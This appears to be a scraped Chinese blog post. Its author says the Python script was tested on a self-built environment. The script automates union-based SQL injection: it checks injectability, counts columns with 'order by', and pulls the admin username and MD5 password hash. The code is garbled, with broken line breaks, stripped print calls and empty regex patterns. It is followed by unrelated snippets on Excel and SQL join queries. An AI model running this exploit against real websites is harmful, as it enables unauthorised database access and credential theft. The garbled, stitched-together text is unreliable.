由於是對自己搭建的環境進行測試 所以覺得很僵硬 並且這個程式還沒有爆破的功能,聯合查詢時只能用常用的 admin,password 這點以後有時間可以改進
注入點:
上**吧:
#coding:utf-8import requests
import re
s=requests.session()
url1=' '
def order_by(url1):#判斷有多少字段
for i in
range(1,100):
url = url1+'order by '+str(i)
r=s.get(url,timeout=2)
if r.status_code!=200:
return i
break
def point_(url1):#判斷是否可注入
url_t=url1+' and 1=1'
url_f=url1+' and 1=2'
r1=requests.get(url_t)
r2=requests.get(url_f)
if r1.status_code!=r2.status_code:
'存在注入'
return
1def biaodashi(url1,j): #組合形成查詢表示式
key='1'
f=1for f in
range(2,j):
key=key+','+str(f)
return key
try:
if point_(url1)==1:
order_by=order_by(url1=url1)
biaodashi=biaodashi(url1=url1,j=order_by)
yuju='union select '+biaodashi+' from admin'
url=url1+yuju
r=requests.get(url).content
#3pattern=re.compile('(.*?)')
l1=re.search(pattern,r).group(1)
sql=url.replace(','+l1,',admin')
r = requests.get(sql).content
pattern = re.compile('(.*?)')
username= re.search(pattern, r).group(1)
'username:'+username
sql2=url.replace(','+l1,',password')
r = requests.get(sql2).content
password=re.search(pattern, r).group(1)
'password:'+password+'------(md5)'
else:
'不存在注入點'
except:
pass
Execl ADO SQL 聯合查詢
原題目 如何從兩張excel表中取數,生成第三張表?表一 a姓名 b身份證號 c金額1 張三642120197409020031 21002李四 552120197509020031 31003王五 693120197408020031 20004陳三 642202197409020031 1000...
SQL 聯合查詢
use xsgl go select from student select from cause select from exam 聯合查詢 join on 預設為inner,如果有right or left 那麼就指的是外聯,outer 可以不寫 1.最長見為內聯 table1 inner jo...
mysql聯合查詢
有乙個前提很重要 就是兩個表中的對應字段應該是建立聯合關係且該鍵應唯一 在查詢該聯合建的時候要指明 表.欄位 1.select from 表a,表a子表 where表a.filecode 表a子表.filecodeand表a.id in select 表a子表 id from 表a子表 where ...